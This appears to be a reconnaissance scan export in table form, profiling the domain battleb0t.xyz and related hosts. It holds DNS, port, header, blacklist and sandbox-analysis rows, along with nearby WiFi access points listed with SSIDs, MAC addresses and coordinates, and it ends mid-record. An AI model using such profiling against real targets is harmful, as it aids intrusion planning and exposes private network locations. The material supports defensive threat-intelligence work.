| 2023-05-12 02:54:23 | Linked URL - Internal | No | Web Spider | 5 | 0 | 4 | 0 | None | https://www.ayhu.xyz/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU | https://www.ayhu.xyz/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-tikaro.github.io | 185.199.111.153 |
| 2023-05-12 02:44:28 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 185.199.110.153 | www.battleb0t.xyz |
| 2023-05-12 03:03:28 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | 001viet.com | 001viet.com |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | taylor (Net ID: 00:06:25:9A:21:94) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:46:50 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | 34.148.97.127 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/carti_3.JPG | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.144): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NGMH (Net ID: 00:09:5B:B3:C8:73) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | roxie (Net ID: 00:02:6F:E5:4F:4C) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:44:58 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | San Francisco, California, CA, United States, US | 185.199.110.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet24CE (Net ID: 00:01:36:59:24:CC) | 37.7813933,-122.3918002 |
| 2023-05-12 02:51:59 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://acmephp.github.io/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ed8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_ed8_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_ed8_IESQMMUTEX_0_303"\n "IsoScope_ed8_IE_EarlyTabStart_0xdcc_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3800"\n "IsoScope_ed8_IESQMMUTEX_0_331"\n "IsoScope_ed8_ConnHashTable<3800>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"acmephp.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<a href="https://twitter.com/acme_php">" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<i class="fa fa-twitter"></i>" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<span>Follow on Twitter</span>" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<a href="https://twitter.com/acme_php">Twitter</a>" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<a href="https://twitter.com/titouangalopin">@tgalopin</a> and" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<a href="https://twitter.com/jderusse">@jderusse</a>" (Indicator: "dir "; File: "786RITC2.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\2uxtwtjr\\favicon[1].ico"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\locallow\\microsoft\\internet explorer\\services\\search_{0633ee93-d776-472f-a0ff-e1416b8b2e3a}.ico"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{d2ad0b8a-ed80-11ed-b43f-080027944a9e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df48e04c2c232f3230.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfdcbc4d5dbdf1df3e.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{cb6dd7e9-ed80-11ed-b43f-080027944a9e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dff77628f7bf10b560.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\2uxtwtjr\\favicon[1].ico"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\locallow\\microsoft\\internet explorer\\services\\search_{0633ee93-d776-472f-a0ff-e1416b8b2e3a}.ico"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\ckdncxys\\favicon[1].ico"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df48e04c2c232f3230.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{d2ad0b8a-ed80-11ed-b43f-080027944a9e}.dat"\n "iexplore.exe" reads file "c:\\windows\\fonts\\staticcache.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dff77628f7bf10b560.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{cb6dd7e9-ed80-11ed-b43f-080027944a9e}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfdcbc4d5dbdf1df3e.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{cb6dd7e7-ed80-11ed-b43f-080027944a9e}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fontawesome-webfont_1_.eot" has type "Embedded OpenType (EOT) FontAwesome family"- [targetUID: N/A]\n "AvenirNextLTPro-Regular_1_.woff" has type "Web Open Font Format CFF length 38024 version 0.0"- [targetUID: N/A]\n "font-awesome.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003800]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF48E04C2C232F3230.TMP" has type "data"- Location: [%TEMP%\\~DF48E04C2C232F3230.TMP]- [targetUID: 00000000-00003800]\n "~DFF77628F7BF10B560.TMP" has type "data"- Location: [%TEMP%\\~DFF77628F7BF10B560.TMP]- [targetUID: 00000000-00003800]\n "~DF6EABB9BAE595B52D.TMP" has type "data"- Location: [%TEMP%\\~DF6EABB9BAE595B52D.TMP]- [targetUID: 00000000-00003800]\n "~DFDCBC4D5DBDF1DF3E.TMP" has type "data"- Location: [%TEMP%\\~DFDCBC4D5DBDF1DF3E.TMP]- [targetUID: 00000000-00003800]\n "urlref_httpsacmephp.github.io" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "fonts_1_.css" has type "ASCII text"- [targetUID: N/A]\n "app_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._CB6DD7E7-ED80-11ED-B43F-080027944A9E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_CB6DD7E9-ED80-11ED-B43F-080027944A9E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_D2AD0B8A-ED80-11ED-B43F-080027944A9E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "SBXI2I91.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SBXI2I91.txt]- [targetUID: 00000000-00002844]\n "CPJIWZZK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CPJIWZZK.txt]- [targetUID: 00000000-00003800]\n "C8FKJFB2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C8FKJFB2.txt]- [targetUID: 00000000-00003800]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "D3WB1LDR.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\D3WB1LDR.txt]- [targetUID: 00000000-00002844]\n "YI9AAEHI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YI9AAEHI.txt]- [targetUID: 00000000-00003800]\n "N8OPXZSU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\N8OPXZSU.txt]- [targetUID: 00000000-00003800]\n "8X4V8G7W.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8X4V8G7W.txt]- [targetUID: 00000000-00003800]\n "786RITC2.htm" has type "HTML document UTF-8 Unicode text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\786RITC2.htm]- [targetUID: 00000000-00002844]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'n | 185.199.108.153 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.242): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | shithead (Net ID: 00:0C:41:43:78:70) | 39.0469, -77.4903 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SINGER (Net ID: 00:00:71:90:09:29) | 41.8781, -87.6298 |
| 2023-05-12 02:45:34 | Name Server (DNS NS Records) | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | skip.ns.cloudflare.com | battleb0t.xyz |
| 2023-05-12 03:09:30 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | malsup.github.io |
| 2023-05-12 02:45:34 | Affiliate - Internet Name | No | DNS Raw Records | 1 | 0 | 1 | 0 | None | daphne.ns.cloudflare.com | battleb0t.xyz |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [006blog.github.io]
https://www.openphish.com/feed.txt | 006blog.github.io |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.246): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | union church (Net ID: 00:00:C5:FE:88:4C) | 34.0544, -118.244 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | niudnav (Net ID: 00:0C:F6:63:91:4C) | 50.8897, 6.0563 |
| 2023-05-12 02:54:00 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5d3adbfbad871d-ORD
Content-Encoding: gzip
| 104.21.6.166 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Persistent_Auth": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Host": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Www_Authenticate": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Persistent_Auth": ["false"], "Expires": ["Fri, 01 Jan 1990 00:00:00 GMT"], "Vary": ["Accept-Encoding"], "Host": ["87.248.157.102:2077"], "Server": ["cPanel"], "Connection": ["close"], "Www_Authenticate": ["Basic realm=\"Restricted Area\""], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"], "Cache_Control": ["no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
| 2023-05-12 03:03:55 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | etherum-libs.github.io | 185.199.108.153 |
| 2023-05-12 03:25:08 | Internet Name | No | DNS Brute-forcer | 1 | 0 | 1 | 0 | None | vm.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | eminent_g_router (Net ID: 00:14:5C:85:F6:6A) | 50.8897, 6.0563 |
| 2023-05-12 03:33:47 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | "Exif
sgssso
<Qwm7
>6x.O
x>t7?
g$sy?
.b97<
/Ggy!
l/5-o
ggs43Z
x.o.n>
NNEsz
gmuss
Mswy5
dIys6
>t6w6
03Ryr\G
a>0xM
g_on8
9!6sBsmms
?r:\t
L5M3O
nq_JxO
`uns?g
F1_?J
$vw3C
?.O:H
Gq$rMmo
0y7?i
<?qgg
WYeyq$
!um_KM
ykmsrzz
?2Cm7
3>O0?
irIyo
t.Iof?y
R\y2I
tnt"3
!t5K?/
hfIoq'
bI>sy
w?f?f?
<Aq"Cio
/uMbO
> Ige
>km7M
1$vw0
y.n/"
/uM>9
njKym
v:Ky$
ryw2Com
s<U?o
v?R.>
hGydd
soyg'
:7Ieq
5zO-$
2pMsw
wGo$w?<w
:xssms
jVw:o
.?ygs
nn9?m
oO_n:
nFumS
W7ofc
U95 5
Gs\-?o
ry>f<
gae$w
?2kmO
sIyf/!
t8y<?
\Cwy1
_Bx_K
oeqq$
g5b9c
/2?.o/
hcg>o
kkkn?
/`0E'
xn/<a
uwosm
.<7qq
zdWqk
$1\Mm
rzW?'
tx<Iogss
ldU9?
K?.?/
r\isI
?6gAs
$Kxn<
nnnOS
qyooo
Hc<M?
Ej\Ioy'
x'8_a | https://pics.battleb0t.xyz/images/reveloder.jpg |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 02:55:11 | Netblock Membership | No | Censys | 4 | 0 | 2 | 0 | None | 87.248.157.0/24 | 87.248.157.102 |
| 2023-05-12 02:54:41 | Netblock Membership | No | Censys | 0 | 0 | 3 | 0 | None | 104.196.16.0/20 | 104.196.30.220 |
| 2023-05-12 03:09:42 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 117.97.148.34.bc.googleusercontent.com | 34.148.97.117 |
| 2023-05-12 03:24:33 | Malicious Affiliate | Yes | VXVault.net | 0 | 1 | 4 | 0 | None | VXVault Malicious URL List [cdn-185-199-110-154.github.com]
http://vxvault.net/URL_List.php | cdn-185-199-110-154.github.com |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CATYLN (Net ID: 00:01:38:86:06:1F) | 37.780462,-122.390564 |
| 2023-05-12 02:53:22 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 2606:4700:3037::6815:470e | nwapi2.battleb0t.xyz |
| 2023-05-12 02:44:31 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2600:1f18:2489:8202::c8 | funny.battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | redskins33 (Net ID: 00:09:5B:85:B7:B6) | 39.0469, -77.4903 |
| 2023-05-12 02:45:40 | Physical Location | No | AbstractAPI | 1 | 0 | 2 | 0 | None | San Francisco (South Beach), California, 94107, United States, North America | 185.199.111.153 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.250): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.37): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:33 | Web Server | No | Tool - WhatWeb | 0 | 0 | 2 | 0 | None | cloudflare | www.ayhu.xyz |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 2 | 0 | None | http://fluid.battleb0t.xyz | fluid.battleb0t.xyz |
| 2023-05-12 02:45:57 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 4 | 0 | None | {u'city': u'Ashburn', u'security': {u'is_vpn': False}, u'city_geoname_id': 4744870, u'region_geoname_id': 6254928, u'country': u'United States', u'region': u'Virginia', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'AMAZON-AES', u'isp_name': u'Amazon.com, Inc.', u'organization_name': u'Amazon Technologies Inc', u'autonomous_system_number': 14618}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'20149', u'longitude': -77.4903, u'country_code': u'US', u'timezone': {u'abbreviation': u'EDT', u'gmt_offset': -4, u'is_dst': True, u'name': u'America/New_York', u'current_time': u'22:45:56'}, u'latitude': 39.0469, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'2600:1f18:2489:8202::c8', u'continent': u'North America', u'region_iso_code': u'VA'} | 2600:1f18:2489:8202::c8 |
| 2023-05-12 03:08:48 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.230 | 104.196.30.220 |
| 2023-05-12 03:32:08 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.5:8080 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:74:99:A4:64) | 41.8781, -87.6298 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Apple Network 3ac606 (Net ID: 00:02:2D:21:9A:18) | 34.0544, -118.244 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:2083 | 104.21.6.166 |
| 2023-05-12 03:00:51 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000000014286.github.io | 185.199.111.153 |
| 2023-05-12 03:03:47 | Co-Hosted Site | No | ThreatMiner | 1 | 0 | 2 | 0 | None | scoop.sh | 185.199.111.153 |
| 2023-05-12 03:01:03 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.108): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | HubPages (Category: blog)
https://hubpages.com/@login | login |
| 2023-05-12 02:53:07 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.111.154:443 | 185.199.111.0/24 |
| 2023-05-12 02:53:59 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://kurt-defreitas.github.io/img/placeholder.svg', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_9f8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_9f8_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "IsoScope_9f8_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_9f8_ConnHashTable<2552>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_9f8_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2552"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_9f8_IE_EarlyTabStart_0xb00_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"kurt-defreitas.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "en-US.5" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.5]- [targetUID: 00000000-00002552]\n "~DF132D18D7697B1B40.TMP" has type "data"- Location: [%TEMP%\\~DF132D18D7697B1B40.TMP]- [targetUID: 00000000-00002552]\n "~DFF703004D4AAD5F49.TMP" has type "data"- Location: [%TEMP%\\~DFF703004D4AAD5F49.TMP]- [targetUID: 00000000-00002552]\n "~DF13EE8B4FF73D23D0.TMP" has type "data"- Location: [%TEMP%\\~DF13EE8B4FF73D23D0.TMP]- [targetUID: 00000000-00002552]\n "~DF4D594C562EE2D021.TMP" has type "data"- Location: [%TEMP%\\~DF4D594C562EE2D021.TMP]- [targetUID: 00000000-00002552]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._AA626797-D3A5-11ED-8072-080027477A00_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_B2115BA0-D3A5-11ED-8072-080027477A00_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_AA626799-D3A5-11ED-8072-080027477A00_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "LHKBGYS9.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\LHKBGYS9.txt]- [targetUID: 00000000-00003016]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "VP6RUECO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\VP6RUECO.txt]- [targetUID: 00000000-00002552]\n "5CPGZ5IA.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5CPGZ5IA.txt]- [targetUID: 00000000-00002552]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', 